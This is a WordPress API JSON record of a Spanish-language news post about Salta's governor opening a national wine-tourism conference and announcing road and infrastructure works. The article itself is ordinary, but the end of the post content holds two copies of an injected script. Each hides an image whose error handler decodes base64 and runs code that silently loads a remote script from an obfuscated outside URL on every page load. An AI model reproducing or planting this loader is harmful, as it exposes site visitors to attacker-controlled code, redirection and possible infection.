{"id":1839,"date":"2022-11-24T15:39:13","date_gmt":"2022-11-24T18:39:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1839"},"modified":"2025-08-14T00:29:30","modified_gmt":"2025-08-14T03:29:30","slug":"saenz-la-ruta-del-vino-de-altura-distingue-a-salta-en-el-pais-posicionandola-como-el-segundo-destino-enoturistico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1839","title":{"rendered":"S\u00e1enz: \u201cLa Ruta del Vino de Altura distingue a Salta en el pa\u00eds, posicion\u00e1ndola como el segundo destino enotur\u00edstico\u201d"},"content":{"rendered":"\n<p>Se realizan las II Jornadas Nacionales de Turismo del Vino, un encuentro de los principales referentes nacionales e internacionales de la industria. All\u00ed, el Gobernador afirm\u00f3 que continuar\u00e1 desarrollando pol\u00edticas de incentivo al sector. Se proyectan obras por $2600 millones.<\/p>\n\n\n\n<p>El gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>&nbsp;inaugur\u00f3 las II Jornadas Nacionales de Turismo del Vino y las I Internacionales, que se realizan en coincidencia con el D\u00eda del Vino Argentino, bebida nacional.<\/p>\n\n\n\n<p>Con la presencia de m\u00e1s de 300 referentes nacionales e internacionales de la industria, el mandatario destac\u00f3 que la Ruta del Vino de Altura distingue a Salta en el pa\u00eds y la coloca en el segundo destino enotur\u00edstico del pa\u00eds.<\/p>\n\n\n\n<p>En ese contexto, el Gobernador expres\u00f3 que \u201ceste Gobierno tom\u00f3 la decisi\u00f3n pol\u00edtica de seguir fortaleciendo la Ruta del Vino que recibir\u00e1 una inversi\u00f3n de $2.600 millones de pesos en obras\u201d. As\u00ed enumer\u00f3 el nuevo Centro de Convenciones en Cafayate, obras en el dique Cabra Corral; la pavimentaci\u00f3n de dos tramos de la ruta nacional 40, miradores en rutas esc\u00e9nicas a trav\u00e9s del plan nacional 50 destinos, m\u00e1s se\u00f1al\u00e9tica en la ruta, entre otras obras que incluye la refuncionalizaci\u00f3n de los campings de Seclant\u00e1s, Molinos, Angastaco y Cachi.<\/p>\n\n\n\n<p>El Gobernador resalt\u00f3 que en Salta, el cultivo de la vid involucra a m\u00e1s de 10 municipios en un circuito que parte desde el sur del valle de Lerma hacia los valles Calchaqu\u00edes.<\/p>\n\n\n\n<p>De esta manera, el fortalecimiento del enoturismo contribuye al desarrollo de toda la regi\u00f3n, con la generaci\u00f3n de divisas, crecimiento econ\u00f3mico, creaci\u00f3n de nuevos puestos de trabajo y la redistribuci\u00f3n del ingreso para corregir desequilibrios regionales a partir de la actividad en centros urbanos de baja poblaci\u00f3n, pero con recursos naturales.<\/p>\n\n\n\n<p>Pablo Asens, vicepresidente de la Corporaci\u00f3n Vitivin\u00edcola Argentina, indic\u00f3 que desde la corporaci\u00f3n se est\u00e1 trabajando fuertemente en \u201cel turismo del vino\u201d, &nbsp;y afirm\u00f3 &nbsp;\u201ccada vez estamos m\u00e1s orgullosos &nbsp;de lo que podemos mostrar al mundo desde nuestras bodegas\u201d.<\/p>\n\n\n\n<p>Jorge Solmi, &nbsp;secretario de Coordinaci\u00f3n Federal de Agricultura del Ministerio de Econom\u00eda de la Naci\u00f3n, se\u00f1al\u00f3 la preocupaci\u00f3n por la situaci\u00f3n que est\u00e1n atravesando en esta actividad, que han sufrido una helada muy considerable. En este marco inform\u00f3 que &nbsp;est\u00e1n trabajando \u201cen medidas que pr\u00f3ximamente ser\u00e1n puestas en funcionamiento\u201d.<\/p>\n\n\n\n<p>Sergio Castro Director &nbsp;Nacional de Planificaci\u00f3n y Desarrollo Tur\u00edstico asegur\u00f3 que desde &nbsp;el Ministerio de Turismo de Naci\u00f3n &nbsp;hay una fuerte decisi\u00f3n en apoyar al turismo del vino, y destac\u00f3 la importancia de estar jornadas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"901\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/4974-el-gobernador-saenz-en-las-ii-jornadas-de-turismo-del-vino.jpg\" alt=\"\" class=\"wp-image-1840\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/4974-el-gobernador-saenz-en-las-ii-jornadas-de-turismo-del-vino.jpg 901w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/4974-el-gobernador-saenz-en-las-ii-jornadas-de-turismo-del-vino-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/4974-el-gobernador-saenz-en-las-ii-jornadas-de-turismo-del-vino-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/4974-el-gobernador-saenz-en-las-ii-jornadas-de-turismo-del-vino-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/4974-el-gobernador-saenz-en-las-ii-jornadas-de-turismo-del-vino-631x420.jpg 631w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><\/figure>\n\n\n\n<p><strong>Las Jornadas<\/strong><\/p>\n\n\n\n<p>Este encuentro tiene por objetivo brindar un espacio de di\u00e1logo, intercambio, capacitaci\u00f3n y formaci\u00f3n, a los fines de continuar fortaleciendo y desarrollando el Turismo del Vino en Argentina con la presencia de destacados expositores nacionales e internacionales.<\/p>\n\n\n\n<p>El turismo es una de las actividades m\u00e1s asociativas por inercia donde el flujo de divisas que se generan impacta en rubros vinculados directamente, pero tambi\u00e9n en aquellos que se nutren del derrame de manera indirecta. No s\u00f3lo genera crecimiento, empleo y efectos multiplicadores en las actividades directas (hoteles y restaurantes, agencias de viajes), sino tambi\u00e9n en una gran cantidad de otras actividades indirectamente.<\/p>\n\n\n\n<p>Tambi\u00e9n participaron de la inauguraci\u00f3n de estas jornadas organizadas por el Ministerio de Turismo y Deportes de la naci\u00f3n y de Salta y la Corporaci\u00f3n Vitivin\u00edcola Argentina, representantes de la Direcci\u00f3n Nacional de Promoci\u00f3n Estrat\u00e9gica de Turismo de la Naci\u00f3n, C\u00e1mara de Turismo de Salta, Asociaci\u00f3n de Hoteles de Turismo de la Rep\u00fablica Argentina, Salta Convention Bureau, Asociaci\u00f3n salte\u00f1a de Agencias de Turismo de Salta, Camara Hotelera y Gastron\u00f3mica de Salta, Asociaci\u00f3n de Operadores y Prestadores de Turismo Alternativo, Aerolineas Argentinas, Instituto Nacional de Vitivinicultura, Consejo Federal de Turismo, INPROTUR, Observatorio del Vino; y funcionarios de Turismo de distintas provincias y referentes del sector privado provincial y nacional.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se realizan las II Jornadas Nacionales de Turismo del Vino, un encuentro de los principales referentes nacionales e internacionales de la industria. All\u00ed, el Gobernador afirm\u00f3 que continuar\u00e1 desarrollando pol\u00edticas de incentivo al sector. Se proyectan obras por $2600 millones. El gobernador&nbsp;Gustavo S\u00e1enz&nbsp;inaugur\u00f3 las II Jornadas Nacionales de Turismo del Vino y las I Internacionales, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1841,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24],"tags":[],"class_list":{"0":"post-1839","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1839"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1839"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1839\/revisions"}],"predecessor-version":[{"id":7265,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1839\/revisions\/7265"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1841"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1839"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}